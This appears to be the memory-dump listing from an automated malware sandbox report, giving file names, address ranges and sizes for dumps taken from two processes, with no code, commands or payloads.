                                                                                                • memory/1652-494-0x000000001CA60000-0x000000001CB82000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.1MB

                                                                                                • memory/1652-495-0x000000001C540000-0x000000001C54C000-memory.dmp

                                                                                                  Filesize

                                                                                                  48KB

                                                                                                • memory/1652-195-0x00000000009D0000-0x00000000009EC000-memory.dmp

                                                                                                  Filesize

                                                                                                  112KB

                                                                                                • memory/1652-196-0x00000000023B0000-0x00000000023C0000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/1652-536-0x000000001C960000-0x000000001C982000-memory.dmp

                                                                                                  Filesize

                                                                                                  136KB

                                                                                                • memory/1652-14-0x00000000009F0000-0x0000000000A66000-memory.dmp

                                                                                                  Filesize

                                                                                                  472KB

                                                                                                • memory/1652-541-0x000000001C550000-0x000000001C55A000-memory.dmp

                                                                                                  Filesize

                                                                                                  40KB

                                                                                                • memory/1652-199-0x000000001B550000-0x000000001B5B6000-memory.dmp

                                                                                                  Filesize

                                                                                                  408KB

                                                                                                • memory/1652-4-0x00007FF8978D3000-0x00007FF8978D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1652-5-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-540-0x000000001CD80000-0x000000001CEB4000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.2MB

                                                                                                • memory/1652-13-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-12-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-11-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-692-0x000000001C990000-0x000000001CA0A000-memory.dmp

                                                                                                  Filesize

                                                                                                  488KB

                                                                                                • memory/1652-735-0x000000001CB80000-0x000000001CC04000-memory.dmp

                                                                                                  Filesize

                                                                                                  528KB

                                                                                                • memory/1652-9-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-743-0x000000001CA10000-0x000000001CA1E000-memory.dmp

                                                                                                  Filesize

                                                                                                  56KB

                                                                                                • memory/1652-744-0x000000001CA50000-0x000000001CA5A000-memory.dmp

                                                                                                  Filesize

                                                                                                  40KB

                                                                                                • memory/1652-8-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/4924-59-0x0000023CBDC20000-0x0000023CBDC40000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB

                                                                                                • memory/4924-28-0x0000023CBD860000-0x0000023CBD880000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB

                                                                                                • memory/4924-23-0x0000023CBC840000-0x0000023CBC940000-memory.dmp

                                                                                                  Filesize

                                                                                                  1024KB

                                                                                                • memory/4924-24-0x0000023CBC840000-0x0000023CBC940000-memory.dmp

                                                                                                  Filesize

                                                                                                  1024KB

                                                                                                • memory/4924-44-0x0000023CBD820000-0x0000023CBD840000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB